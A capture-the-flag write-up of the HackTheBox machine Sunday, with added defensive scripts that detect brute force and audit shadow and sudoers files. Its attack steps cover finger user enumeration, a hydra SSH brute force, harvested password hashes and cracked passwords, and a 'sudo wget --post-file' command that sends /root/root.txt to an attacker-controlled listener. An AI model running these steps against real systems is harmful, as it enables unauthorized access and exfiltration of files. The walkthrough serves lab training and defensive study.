Sunday — HackTheBox Writeup

Hello everyone, this time I'll cover the writeup for the HackTheBox machine Sunday.

Let's start by running nmap with the command nmap -sV 10.10.10.76 -p- -T4 --min-rate 1000 --max-retries 2 --initial-rtt-timeout 500ms -Pn

Warning: 10.10.10.76 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.76
Host is up (0.19s latency).
Not shown: 58553 filtered tcp ports (no-response), 6977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
79/tcp open finger?
111/tcp open rpcbind
515/tcp open printer
6787/tcp open http Apache httpd
22022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=12/14%Time=675D68BF%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login
SF:\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x2
SF:0\x20\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nH
SF:ELP\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Nam
SF:e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Wh
SF:ere\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\
SF:.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%
SF:r(SSLSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\
SF:x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20
SF:\x20\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

The scan gives us the open ports listed above. We can see a finger daemon running on port 79, so we'll enumerate users through it with finger-user-enum from pentestmonkey: https://pentestmonkey.net/tools/user-enumeration/finger-user-enum

┌──(root㉿kali)-[~]
└─# perl finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sat Dec 14 06:29:56 2024 #########
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..dhcpserv DHCP Configuration A < . . . . >..ikeuser IKE Admin < . . . . >..lp Line Printer Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
ike@10.10.10.76: ikeuser IKE Admin < . . . . >..
jo ann@10.10.10.76: Login Name TTY Idle When Where..ann ???..jo ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..mela ???..miof ???..
root@10.10.10.76: root Super-User ssh <Dec 7, 2023> 10.10.14.46 ..
sammy@10.10.10.76: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sunny@10.10.10.76: sunny ??? ssh <Dec 14 11:41> 10.10.14.10 ..
sys@10.10.10.76: sys ??? < . . . . >..
zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Sat Dec 14 06:44:46 2024 #########
16 results.
10177 queries in 890 seconds (11.4 queries / sec)
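
The finger daemon confirms which logins exist and, for accounts with login history, when and from where they last logged in. As an added example (not part of the original writeup, and not pentestmonkey's code), the following Python script parses finger-user-enum output like the listing above and separates real accounts from the header and unknown-user echoes, so a defender can see exactly what the service discloses. The sample input is copied from the output above; the parser and its function names are my own.

```python
import re

# Constructed sample: a subset of the finger-user-enum result lines shown above.
FINGER_RESULTS = """\
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
root@10.10.10.76: root Super-User ssh <Dec 7, 2023> 10.10.14.46 ..
sammy@10.10.10.76: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
sunny@10.10.10.76: sunny ??? ssh <Dec 14 11:41> 10.10.14.10 ..
sys@10.10.10.76: sys ??? < . . . . >..
"""

# One finger record: login, free-text name (plus TTY when present), a <when>
# field that is either a login time or ". . . ." for never, and an optional
# source host. Header echoes and "name ???" unknown-user echoes have no <...>.
RECORD = re.compile(
    r'^(?P<login>\S+)\s+(?P<name>.*?)\s*<(?P<when>[^>]*)>\s*(?P<where>\S*)')


def parse_finger_results(text):
    """Return {login: {"name", "last_login", "source"}} for every account the
    finger daemon confirmed. last_login/source are None when never logged in."""
    accounts = {}
    for line in text.splitlines():
        if ": " not in line:
            continue
        _, body = line.split(": ", 1)
        # finger-user-enum joins the daemon's output lines with ".."
        for rec in body.split(".."):
            m = RECORD.match(rec.strip())
            if not m:
                continue
            when = m.group("when").replace(".", "").strip()
            accounts.setdefault(m.group("login"), {
                "name": m.group("name"),
                "last_login": when or None,
                "source": m.group("where") or None,
            })
    return accounts


def interactive_accounts(text):
    """Logins with a recorded session: the accounts whose exposure matters most."""
    return sorted(l for l, a in parse_finger_results(text).items()
                  if a["last_login"])


if __name__ == "__main__":
    for login, info in parse_finger_results(FINGER_RESULTS).items():
        print(f"{login:10} last login: {info['last_login']}  from: {info['source']}")
    print("interactive:", interactive_accounts(FINGER_RESULTS))
```

The fix on the server side is simply not to expose finger (svcadm disable on Solaris); the parser is useful for reviewing what an exposed instance has already disclosed.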

We'll focus on two users, sammy and sunny. We'll try logging in as sunny with ssh -p 22022 sunny@10.10.10.76, but first we brute-force the password with hydra using hydra -l sunny -P /usr/share/wordlists/rockyou.txt -vV ssh://10.10.10.76:22022

[VERBOSE] Retrying connection for child 5
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "yankees1" - 2369 of 14344400 [child 15] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "scarlet" - 2370 of 14344400 [child 1] (0/1)
[RE-ATTEMPT] target 10.10.10.76 - login "sunny" - pass "southpark" - 2370 of 14344400 [child 5] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "powers" - 2371 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "killua" - 2372 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "leandro" - 2373 of 14344400 [child 1] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "burbuja" - 2374 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "bonjour" - 2375 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "armani" - 2376 of 14344400 [child 12] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "poop" - 2377 of 14344400 [child 1] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "nadia" - 2378 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "michigan" - 2379 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "astrid" - 2380 of 14344400 [child 12] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "billybob" - 2381 of 14344400 [child 6] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "theman" - 2382 of 14344400 [child 2] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "sunday" - 2383 of 14344400 [child 7] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "loquita" - 2384 of 14344400 [child 9] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "kristy" - 2385 of 14344400 [child 12] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "believe" - 2386 of 14344400 [child 13] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "missyou" - 2387 of 14344400 [child 6] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "english" - 2388 of 14344400 [child 2] (0/1)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "timmy" - 2389 of 14344400 [child 11] (0/1)
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
[STATUS] attack finished for 10.10.10.76 (waiting for children to complete tests)
[ERROR] could not connect to target port 22022: Socket error: disconnected
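
The hydra run above is what the attack looks like from the attacker's side: thousands of password attempts against one account over a few minutes, then a success. As an added defensive example (not from the writeup), here is the detection a defender would run over sshd logs. The log lines are constructed in OpenSSH's syslog format, reusing the writeup's host name, user names and attacker address; the timestamps, the threshold of five failures and the 60-second window are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (OpenSSH syslog format). Timestamps are invented.
SSHD_LOG = """\
Dec 14 11:40:01 sunday sshd[1201]: Failed password for sunny from 10.10.14.10 port 50211 ssh2
Dec 14 11:40:01 sunday sshd[1202]: Failed password for sunny from 10.10.14.10 port 50212 ssh2
Dec 14 11:40:02 sunday sshd[1203]: Failed password for sunny from 10.10.14.10 port 50213 ssh2
Dec 14 11:40:02 sunday sshd[1204]: Failed password for sunny from 10.10.14.10 port 50214 ssh2
Dec 14 11:40:03 sunday sshd[1205]: Failed password for sunny from 10.10.14.10 port 50215 ssh2
Dec 14 11:40:03 sunday sshd[1206]: Failed password for sunny from 10.10.14.10 port 50216 ssh2
Dec 14 11:40:05 sunday sshd[1207]: Accepted password for sunny from 10.10.14.10 port 50217 ssh2
Dec 14 11:41:00 sunday sshd[1208]: Failed password for sammy from 10.10.14.13 port 50301 ssh2
Dec 14 11:45:00 sunday sshd[1209]: Accepted publickey for sammy from 10.10.14.13 port 50302 ssh2
"""

AUTH_LINE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<src>[\d.]+) port \d+')


def parse_auth_events(log, year=2024):
    """Return (timestamp, result, user, source) for each sshd auth line.
    Syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in log.splitlines():
        m = AUTH_LINE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(log, threshold=5, window=timedelta(seconds=60)):
    """Alert when one source produces `threshold` failures for one user inside
    `window`, and again when a success follows such a burst (password guessed)."""
    recent = defaultdict(list)  # (src, user) -> timestamps of recent failures
    alerts = []
    for ts, result, user, src in parse_auth_events(log):
        key = (src, user)
        # drop failures that have aged out of the window
        recent[key] = [t for t in recent[key] if ts - t <= window]
        if result == "Failed":
            recent[key].append(ts)
            if len(recent[key]) == threshold:
                alerts.append({"kind": "bruteforce", "src": src,
                               "user": user, "failures": threshold})
        elif recent[key]:
            # the strongest signal: a login succeeds right after a burst of failures
            alerts.append({"kind": "success_after_failures", "src": src,
                           "user": user, "failures": len(recent[key])})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SSHD_LOG):
        print(alert)
```

Note that sammy's single failure followed by a key-based login four minutes later produces no alert: the window keeps ordinary typos from paging anyone, while the hydra-style burst against sunny fires twice, once at the fifth failure and once when the guessed password is accepted.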

And we have the password. Next we log in with those credentials and look for the user flag.

It looks like we need privilege escalation. First we check which commands our current user is allowed to run with sudo -l

After digging a little deeper, we find a backup folder

sunny@sunday:~$ cd /backup/
sunny@sunday:/backup$ ls
agent22.backup shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
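
A world-readable copy of the shadow file hands out password hashes to any local user, which is the whole finding here. As an added example (not from the writeup), the script below audits a shadow-format file: it tells locked (*LK*) and no-password (NP) Solaris entries apart from real crypt(3) hashes, names the hash algorithm from its prefix, and converts the last-change field (days since the epoch) into a date, which shows how stale a password is. The sample input is the listing above; the function names and the permission check are my own.

```python
import os
import stat
from datetime import date, timedelta

# Constructed copy of the shadow.backup listing above (system accounts trimmed).
SHADOW_BACKUP = """\
mysql:NP:::::::
openldap:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) "$id$" prefix -> algorithm
HASH_ALGOS = {"1": "md5-crypt", "2a": "bcrypt", "2b": "bcrypt",
              "5": "sha256-crypt", "6": "sha512-crypt", "y": "yescrypt"}

EPOCH = date(1970, 1, 1)


def classify_password_field(field):
    """Return (kind, algorithm). Solaris writes *LK* for locked and NP for
    'no password' accounts; only a field starting with '$' is a usable hash."""
    if field.startswith("$"):
        prefix = field.split("$")[1]
        return "hashed", HASH_ALGOS.get(prefix, "unknown")
    if field == "NP":
        return "no-password", None
    if field.startswith("*") or field.startswith("!"):
        return "locked", None
    return "other", None


def audit_shadow(text):
    """List every account whose hash is recoverable from the file, with the
    algorithm and the date of the last password change (field 3)."""
    findings = []
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue
        user, pw, lastchg = fields[0], fields[1], fields[2]
        kind, algo = classify_password_field(pw)
        if kind != "hashed":
            continue
        changed = EPOCH + timedelta(days=int(lastchg)) if lastchg.isdigit() else None
        findings.append({"user": user, "algo": algo, "last_change": changed})
    return findings


def world_readable(path):
    """True if 'other' has read permission; a shadow copy must never have it."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


if __name__ == "__main__":
    for f in audit_shadow(SHADOW_BACKUP):
        print(f"{f['user']:8} {f['algo']:14} password last changed {f['last_change']}")
```

Run against a real backup directory, the two checks to act on are any hashed entry at all in a file that world_readable() reports true, and last_change dates years in the past: sammy's field 6445 decodes to August 1987, sunny's to April 2018.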

We try cracking sammy's hash with John the Ripper (jtr)

Here we find that the password is "cooldude!", so we log in as sammy.

┌──(root㉿kali)-[~]
└─# ssh -p 22022 sammy@10.10.10.76
(sammy@10.10.10.76) Password:
Last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Solaris 11.4.42.111.0 Assembled December 2021
-bash-5.1$ ls
user.txt
-bash-5.1$ cat user.txt
9e89b72e1447880............

We have the user flag; next is root.

Since sammy can run commands as root here, we'll send /root/root.txt straight to our listener as a POST request. First start the listener with nc -lvnp 1212

nc -lnvp 1212
listening on [any] 1212 ...

Next, send /root/root.txt with wget

bash-5.1$ sudo wget http://10.10.14.10:1212 --post-file=/root/root.txt
--2024-12-14 12:17:00-- http://10.10.14.10:1212/
Connecting to 10.10.14.10:1212... connected.
HTTP request sent, awaiting response...

Switching back to the nc tab, the contents of root.txt appear there.

┌──(root㉿kali)-[~]
└─# nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.76] 54655
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (solaris2.11)
Accept: */*
Accept-Encoding: identity
Host: 10.10.14.10:1212
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

6d2f31b56311942af......
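
The root step works because sudo lets sammy run wget as root with any arguments, and wget can read an arbitrary file (--post-file) on root's behalf. The defensive counterpart is to audit sudoers for exactly that pattern. As an added example (not from the writeup, which never shows the machine's real /etc/sudoers), the script below parses a constructed sudoers fragment and flags rules that grant a file-reading, file-writing or shell-spawning binary without pinned arguments. The sudoers lines, the list of risky binaries and the function names are my own assumptions.

```python
import re

# Constructed sudoers fragment for illustration only. The /opt/tools/status.sh
# path and the backup rule are invented; sammy's wget rule mirrors the writeup.
SUDOERS = """\
Defaults    env_reset
root    ALL=(ALL) ALL
%wheel  ALL=(ALL) ALL
sunny   ALL=(root) NOPASSWD: /opt/tools/status.sh
sammy   ALL=(ALL) NOPASSWD: /usr/bin/wget
backup  ALL=(root) /usr/bin/tar -czf /var/backups/etc.tgz /etc
"""

# Binaries that, run as root with caller-chosen arguments, can read or write
# arbitrary files or hand the caller a shell (assumed list, not exhaustive).
RISKY = {
    "wget": "reads any file (--post-file) and writes any file as root",
    "curl": "reads and writes arbitrary files as root",
    "tar": "reads and writes arbitrary paths as root",
    "vi": "editor with a shell escape", "vim": "editor with a shell escape",
    "less": "pager with a shell escape", "more": "pager with a shell escape",
    "find": "runs arbitrary commands as root",
    "python": "interpreter", "perl": "interpreter",
    "bash": "shell", "sh": "shell",
}

# user_or_group  host=(runas) [TAG: ...] command[, command...]
RULE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*'
                  r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def audit_sudoers(text):
    """Return one finding per risky grant: 'ALL' for a non-root principal, or a
    risky binary whose arguments are unrestricted (none given, or a wildcard)."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line.strip())
        if not m or m["who"] == "root":
            continue
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd == "ALL":
                findings.append({"who": m["who"], "runas": m["runas"],
                                 "binary": "ALL", "reason": "unrestricted root"})
                continue
            parts = cmd.split()
            name = parts[0].rsplit("/", 1)[-1]
            args = parts[1:]
            unrestricted = not args or any("*" in a for a in args)
            if name in RISKY and unrestricted:
                findings.append({"who": m["who"], "runas": m["runas"],
                                 "binary": parts[0], "reason": RISKY[name]})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS):
        print(f"{f['who']:8} -> {f['binary']} as {f['runas']}: {f['reason']}")
```

The backup rule is not flagged because its arguments are fixed in sudoers, which is the usual remedy: pin the exact command line, or wrap the task in a root-owned script that takes no user-controlled paths, instead of granting a general-purpose tool like wget.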
